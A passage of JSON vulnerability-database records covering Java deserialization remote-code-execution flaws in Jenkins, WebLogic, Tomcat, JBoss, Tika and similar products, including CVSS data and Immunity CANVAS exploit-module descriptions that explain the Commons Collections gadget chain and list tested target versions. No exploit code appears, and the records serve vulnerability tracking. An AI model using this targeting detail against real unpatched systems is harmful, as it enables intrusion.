"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:nutch:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tika:1.13:*:*:*:*:*:*:*"]}, {"lastseen": "2023-08-07T05:45:00", "description": "The Jenkins CLI subsystem in Jenkins before 1.638 and LTS before 1.625.2 allows remote attackers to execute arbitrary code via a crafted serialized Java object, related to a problematic webapps/ROOT/WEB-INF/lib/commons-collections-*.jar file and the \"Groovy variant in 'ysoserial'\".", "cvss3": {}, "published": "2015-11-25T20:59:00", "type": "cve", "title": "CVE-2015-8103", "cwe": ["CWE-77"], "bulletinFamily": "NVD", "cvss2": 
{"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8103"], "modified": "2019-12-17T17:41:00", "cpe": ["cpe:/a:jenkins:jenkins:1.637", "cpe:/a:jenkins:jenkins:1.625.1", "cpe:/a:redhat:openshift:2.0", "cpe:/a:redhat:openshift:3.1"], "id": "CVE-2015-8103", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8103", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:jenkins:jenkins:1.625.1:*:*:*:lts:*:*:*", "cpe:2.3:a:jenkins:jenkins:1.637:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:openshift:3.1:*:*:*:enterprise:*:*:*", "cpe:2.3:a:redhat:openshift:2.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:36:42", "description": "Atlassian Bamboo before 5.11.4.1 and 5.12.x before 5.12.3.1 does not properly restrict permitted deserialized classes, which allows remote attackers to execute arbitrary code via vectors related to XStream Serialization.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-08-02T16:59:00", "type": "cve", "title": "CVE-2016-5229", "cwe": ["CWE-284"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5229"], "modified": "2018-10-09T20:00:00", "cpe": ["cpe:/a:atlassian:bamboo:5.12.1", "cpe:/a:atlassian:bamboo:5.11.3", "cpe:/a:atlassian:bamboo:5.12.0", "cpe:/a:atlassian:bamboo:5.12.2"], "id": "CVE-2016-5229", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5229", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:atlassian:bamboo:5.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.11.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.12.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:34:32", "description": "HPE iMC PLAT before 7.2 E0403P04, iMC EAD before 7.2 E0405P05, iMC APM before 7.2 E0401P04, iMC NTA before 7.2 E0401P01, iMC BIMS before 7.2 E0402P02, and iMC UAM_TAM before 7.2 E0405P05 allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the Apache Commons Collections (ACC) library.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-07-15T16:59:00", "type": "cve", "title": "CVE-2016-4372", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4372"], "modified": "2017-09-22T01:29:00", "cpe": ["cpe:/a:hp:intelligent_management_center_branch_intelligent_management_system:7.2", "cpe:/a:hp:intelligent_management_center_endpoint_admission_defense:7.2", "cpe:/a:hp:intelligent_management_center_platform:7.2", "cpe:/a:hp:intelligent_management_center_application_performance_manager:7.2", "cpe:/a:hp:intelligent_management_center_user_access_management:7.2", "cpe:/a:hp:intelligent_management_center_network_traffic_analyzer:7.2"], "id": "CVE-2016-4372", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4372", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:hp:intelligent_management_center_user_access_management:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:hp:intelligent_management_center_platform:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:hp:intelligent_management_center_branch_intelligent_management_system:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:hp:intelligent_management_center_application_performance_manager:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:hp:intelligent_management_center_endpoint_admission_defense:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:hp:intelligent_management_center_network_traffic_analyzer:7.2:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-23T15:05:55", "description": "Previous versions of Apache Flex BlazeDS (4.7.2 and earlier) did not restrict which types were allowed for AMF(X) object deserialization by default. During the deserialization process code is executed that for several known types has undesired side-effects. Other, unknown types may also exhibit such behaviors. 
One vector in the Java standard library exists that allows an attacker to trigger possibly further exploitable Java deserialization of untrusted data. Other known vectors in third party libraries can be used to trigger remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-28T15:29:00", "type": "cve", "title": "CVE-2017-5641", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5641"], "modified": "2022-04-19T16:06:00", "cpe": ["cpe:/a:apache:flex_blazeds:4.7.2"], "id": "CVE-2017-5641", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5641", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:flex_blazeds:4.7.2:*:*:*:*:*:*:*"]}], "ubuntucve": [{"lastseen": "2023-09-19T15:24:49", "description": "The WLS Security component in Oracle WebLogic Server 10.3.6.0, 12.1.2.0,\n12.1.3.0, and 12.2.1.0 allows remote attackers to execute arbitrary\ncommands via a crafted serialized Java object in T3 protocol traffic to TCP\nport 7001, related to\noracle_common/modules/com.bea.core.apache.commons.collections.jar. 
NOTE:\nthe scope of this CVE is limited to the WebLogic Server product.\n\n#### Bugs\n\n * <https://bugs.launchpad.net/ubuntu/+source/libcommons-collections3-java/+bug/1514985>\n * <https://bugzilla.redhat.com/show_bug.cgi?id=1279330>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | according to infoq article and digging through openjdk source, there is at least an embedded copy of xalan xslt in openjdk which is also vulnerable, though it may be just an example of a target class to overwrite via desrialization. same as above for libxalan2-java \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | This CVE was originally assigned to Oracle WebLogic, and then was subsequently used by IBM Websphere. It has been proposed to use it for commons-collections. See: http://www.openwall.com/lists/oss-security/2015/11/15/1 Red Hat has assigned CVE-2015-7501 to the issue in JBoss Middleware Suite as of 2018-09-19, no indication that this is being fixed in openjdk, or if it is an issue at all. 
Marking as ignored.\n", "cvss3": {}, "published": "2015-11-18T00:00:00", "type": "ubuntucve", "title": "CVE-2015-4852", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4852", "CVE-2015-7501"], "modified": "2015-11-18T00:00:00", "id": "UB:CVE-2015-4852", "href": "https://ubuntu.com/security/CVE-2015-4852", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-04T14:14:07", "description": "Remote code execution is possible with Apache Tomcat before 6.0.48, 7.x\nbefore 7.0.73, 8.x before 8.0.39, 8.5.x before 8.5.7, and 9.x before\n9.0.0.M12 if JmxRemoteLifecycleListener is used and an attacker can reach\nJMX ports. 
The issue exists because this listener wasn't updated for\nconsistency with the CVE-2016-3427 Oracle patch that affected credential\ntypes.\n\n#### Bugs\n\n * <https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=802312>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-11-24T00:00:00", "type": "ubuntucve", "title": "CVE-2016-8735", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427", "CVE-2016-8735"], "modified": "2016-11-24T00:00:00", "id": "UB:CVE-2016-8735", "href": "https://ubuntu.com/security/CVE-2016-8735", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-29T18:16:28", "description": "Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are\nvulnerable to an unauthenticated remote code execution. An unauthenticated\nremote code execution vulnerability allowed attackers to transfer a\nserialized Java `SignedObject` object to the Jenkins CLI, that would be\ndeserialized using a new `ObjectInputStream`, bypassing the existing\nblacklist-based protection mechanism. We're fixing this issue by adding\n`SignedObject` to the blacklist. 
We're also backporting the new HTTP CLI\nprotocol from Jenkins 2.54 to LTS 2.46.2, and deprecating the\nremoting-based (i.e. Java serialization) CLI protocol, disabling it by\ndefault.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-01-29T00:00:00", "type": "ubuntucve", "title": "CVE-2017-1000353", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000353"], "modified": "2018-01-29T00:00:00", "id": "UB:CVE-2017-1000353", "href": "https://ubuntu.com/security/CVE-2017-1000353", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-04T14:12:41", "description": "The remoting module in Jenkins before 2.32 and LTS before 2.19.3 allows\nremote attackers to execute arbitrary code via a crafted serialized Java\nobject, which triggers an LDAP query to a third-party server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, 
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-01-12T00:00:00", "type": "ubuntucve", "title": "CVE-2016-9299", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299"], "modified": "2017-01-12T00:00:00", "id": "UB:CVE-2016-9299", "href": "https://ubuntu.com/security/CVE-2016-9299", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-29T20:04:20", "description": "In Jboss Application Server as shipped with Red Hat Enterprise Application\nPlatform 5.2, it was found that the doFilter method in the\nReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for\nwhich it performs deserialization and thus allowing an attacker to execute\narbitrary code via crafted serialized data.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-10-04T00:00:00", "type": "ubuntucve", "title": "CVE-2017-12149", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12149"], "modified": "2017-10-04T00:00:00", "id": "UB:CVE-2017-12149", "href": "https://ubuntu.com/security/CVE-2017-12149", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-28T14:28:30", "description": "Apache Tika before 1.14 allows Java code execution for serialized objects\nembedded in MATLAB files. The issue exists because Tika invokes JMatIO to\ndo native deserialization.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | introduced in tika 1.6\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-06T00:00:00", "type": "ubuntucve", "title": "CVE-2016-6809", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6809"], "modified": 
"2017-04-06T00:00:00", "id": "UB:CVE-2016-6809", "href": "https://ubuntu.com/security/CVE-2016-6809", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-09T21:36:13", "description": "The Jenkins CLI subsystem in Jenkins before 1.638 and LTS before 1.625.2\nallows remote attackers to execute arbitrary code via a crafted serialized\nJava object, related to a problematic\nwebapps/ROOT/WEB-INF/lib/commons-collections-*.jar file and the \"Groovy\nvariant in 'ysoserial'\".\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=804522>\n", "cvss3": {}, "published": "2015-11-25T00:00:00", "type": "ubuntucve", "title": "CVE-2015-8103", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8103"], "modified": "2015-11-25T00:00:00", "id": "UB:CVE-2015-8103", "href": "https://ubuntu.com/security/CVE-2015-8103", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "canvas": [{"lastseen": "2021-07-28T14:33:24", "description": "**Name**| weblogic_t3_deserialization \n---|--- \n**CVE**| CVE-2015-4852 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| weblogic_t3_deserialization \n**Notes**| CVE Name: CVE-2015-4852 \nVENDOR: Oracle \nNOTES: \nIMPORTANT NOTE: Any instance of this application running Apache Commons Collections version prior to 3.0 WILL NOT WORK. \n \n \nWeblogic's AdminServer servlet allows remote administration (often unauthenticated) via the \nproprietary T3 protocol. 
This protocol is similar to RMI in the sense that it depends on the exchange \nof serialized Java objects that are then re-serialized. Apache Commons pre-3.2.2 allows users to \nserialize transformers on collection values. Of importance to us is the InvokerTransfomer, which \nis capable of invoking Java methods. We are able to run these transformers by adding them to an \nannotation map whose members are acccessed. The right chain of method invocations leads to arbitrary \ncode execution. \n \nVersion support: \nInstaller did not support the JVM version unless marked otherwise. \n> Ubuntu Linux 14.04.3 - x86 \n\\- 10.3.6 on Java SE 6 \n\\- 10.3.6 on JRockit 1.6 - NOT SUPPORTED \n\\- 12.2.1 on Java SE 8 () \n\\- 12.1.2 on Java SE 7 / 8 \n\\- 12.1.3 on Java SE 7 / 8 \n> Windows 7 Ultimate SP 1 x86 \n\\- 12.1.3 on Java SE 8 - FAILED \n\\- 12.1.3 on Java SE 7 \n\\- 12.1.2 on Java SE 7 \n\\- 12.2.1 on Java SE 8 - FAILED \n\\- 12.2.1 on Java SE 6 - Installer does not support Java version \n\\- 12.2.1 on Java SE 7 - Installer does not support Java version \n\\- 10.3.6 on Java SE 6 \n\\- 10.3.6 on JRockit 1.6 - NOT SUPPORTED \n \n \nRepeatability: One Shot \nReferences: ['http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/', 'https://blogs.apache.org/foundation/entry/apache_commons_statement_to_widespread', 'http://www.oracle.com/technetwork/topcis/security/alert-cve-2015-4852-2763333.html', 'https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7501'] \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4852 \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", 
"userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-11-09T17:29:00", "type": "canvas", "title": "Immunity Canvas: WEBLOGIC_T3_DESERIALIZATION", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501", "CVE-2015-4852"], "modified": "2017-11-09T17:29:00", "id": "WEBLOGIC_T3_DESERIALIZATION", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/weblogic_t3_deserialization", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:20", "description": "**Name**| vrealize_vcofactory_deserialize \n---|--- \n**CVE**| CVE-2015-6934 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| vrealize_vcofactory_deserialize \n**Notes**| CVE Name: CVE-2015-6934 \nVENDOR: VMWare \nNOTES: \nIMPORTANT NOTE: Any instance of this application running Apache Commons Collections version prior to 3.0 WILL NOT WORK. \n \n \nVMWare VRealize has a remoting interface named vcofactory. It communicates with a client by exchanging \nserialized Java objects. \n \nApache Commons pre-3.2 allows users to serialize \ntransformers on collection values. Of importance to us is the InvokerTransfomer, which is capable \nof invoking Java methods. We are able to run these transformers by adding them to an \nannotation map whose members are acccessed. The right chain of method invocations leads to arbitrary \ncode execution. 
\n \nTested targets: \n> vRealize 6.0.1.2490144 \n\\- Windows 8.1 Pro x86_64 EN / Java 6u45 - SUCCESS \n\\- Windows 8.1 Pro x86_64 EN / Java 7u80 - SUCCESS \n\\- Windows 8.1 Pro x86_64 EN / Java 8u73 - SUCCESS \n \n> vCenter Orchestrator Appliance \n\\- Appliance's VMDK is corrupted \n \n> vRealize Operations Manager Appliance 6.2.0.3 \n\\- Publically accessible interfaces require client certificate authentication. A CA-signed client certificate is necessary to connect. \n \nRepeatability: Infinite \nReferences: ['https://www.vmware.com/security/advisories/VMSA-2015-0009'] \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6934 \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 7.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.4}, "published": "2015-12-21T03:59:00", "type": "canvas", "title": "Immunity Canvas: VREALIZE_VCOFACTORY_DESERIALIZE", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6934"], "modified": "2015-12-21T03:59:00", "id": "VREALIZE_VCOFACTORY_DESERIALIZE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/vrealize_vcofactory_deserialize", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": 
"2021-07-28T14:33:32", "description": "**Name**| jenkins_cli_deserialization \n---|--- \n**CVE**| CVE-2015-8103 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| jenkins_cli_deserialization \n**Notes**| CVE Name: CVE-2015-8103 \nVENDOR: Jenkins \nNOTES: \nIMPORTANT NOTE: Any instance of this application running Apache Commons Collections version prior to 3.0 WILL NOT WORK. \n \n \nJenkins has a remote command line interface console. It is often unauthenticated. It communicates \nwith a client by exchanging serialized Java Objects. Apache Commons pre-3.2.2 allows users to \nserialize transformers on collection values. Of importance to us is the InvokerTransfomer, which \nis capable of invoking Java methods. We are able to run these transformers by adding them to an \nannotation map whose members are acccessed. The right chain of method invocations leads to arbitrary \ncode execution. \n \nNOTE: By default, Jenkins starts its management web application on 0.0.0.0:8080. \nFor this module to work, both the web interface specified above *and* the CLI port specified by the \nX-Jenkins-CLI-Port element in the HTTP response headers from said web interface need to be \naccessible by the CANVAS host. 
\n \nVersion support: \n> Windows 7 Ultimate SP1 x86 \n\\- 1.598 on Java SE 6 / 7 / 8 \n\\- 1.637 on Java SE 6 / 7 / 8 \n> Ubuntu Linux 14.04.3 - x86 \n\\- 1.598 on Java SE 6 / 7 / 8 \n\\- 1.600 on Java SE 6 / 7 / 8 \n\\- 1.637 on Java SE 6 / 7 / 8 \n \nRepeatability: Infinite \nReferences: ['http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/', 'https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11'] \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8103 \n\n", "cvss3": {}, "published": "2015-11-25T20:59:00", "type": "canvas", "title": "Immunity Canvas: JENKINS_CLI_DESERIALIZATION", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 